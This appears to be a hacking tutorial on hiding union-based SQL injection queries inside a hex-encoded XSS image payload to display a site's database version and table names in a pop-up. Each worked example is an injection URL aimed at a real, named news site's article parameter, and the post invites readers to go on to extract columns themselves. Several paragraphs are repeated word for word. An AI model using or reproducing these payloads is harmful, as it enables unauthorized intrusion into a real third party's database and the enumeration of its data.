Manipulating SQL Injection Queries in XSS Payload
If we go on Further , we can also show our SQLi Queries Result in a XSS POP-Up Alert.We will insert our SQLi Queries in XSS Payload for showing up SQL Queries output in a POP-Up.
First let's say we want to Show The Current Version of the Target Site in a XSS POP-Up .See the example,
Our XSS Payload for Showing Version in a POP-Up:
<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">
The Red highlighted Text is our SQLi Query and Blue Text is injector name and the Green Text is That we have put for our Variable , and the Other one is Our XSS Payload.
Before executing our Query we need to encode our XSS Payload in Hex Value.
Hex Value of XSS Payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
),4,5,6,7,8,9--+
Let's Execute our Payload:
Let's Add it in our XSS Payload :
If we go on Further , we can also show our SQLi Queries Result in a XSS POP-Up Alert.We will insert our SQLi Queries in XSS Payload for showing up SQL Queries output in a POP-Up.
First let's say we want to Show The Current Version of the Target Site in a XSS POP-Up .See the example,
Our XSS Payload for Showing Version in a POP-Up:
<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">
The Red highlighted Text is our SQLi Query and Blue Text is injector name and the Green Text is That we have put for our Variable , and the Other one is Our XSS Payload.
Before executing our Query we need to encode our XSS Payload in Hex Value.
Hex Value of XSS Payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
),4,5,6,7,8,9--+
Let's Execute our Payload:
and here we got the Current Version in a XSS Pop-up.We can Do the Same For the Current Database and user.
After POP-UP the Version next part is To Showing Tables in a XSS POP-UP Alert.So we have to Insert our Query in XSS Payload for Displaying them in XSS Alert.
Here is our DIOS Query for getting Tables from the Current Database.
After POP-UP the Version next part is To Showing Tables in a XSS POP-UP Alert.So we have to Insert our Query in XSS Payload for Displaying them in XSS Alert.
Here is our DIOS Query for getting Tables from the Current Database.
(select group_concat(table_name) from information_schema.tables where table_Schema=database())
Let's Add this DIOS Query in our XSS Payload .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+
Now execute this Query and Check the output Response
:
We got the Tables from the current Database . But if we go on Further and add HTML TAGS for Starting each Table in a New Line like <BR>.But Here This HTML Doesn't Work.
In XSS we use " \n " which is used for showing each result in a new Line.So will add This Part to Our DIOS Query to show All Tables in a New Line in our XSS Pop-Up.
We Need to First Encode it in Hex Value and then Insert into DIOS Query.
HEX Value: \n :0x5c6e
\n converted into hex 0x5c6e
In XSS we use " \n " which is used for showing each result in a new Line.So will add This Part to Our DIOS Query to show All Tables in a New Line in our XSS Pop-Up.
We Need to First Encode it in Hex Value and then Insert into DIOS Query.
HEX Value: \n :0x5c6e
\n converted into hex 0x5c6e
Let's Add it in our XSS Payload :
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+
And Here we can see all tables are starting from a New line in XSS Pop-up Alert Box.We can do the Same For Columns by adding that Part in our DIOS Query.I Leave That part for You Guys.
Enjoy :]
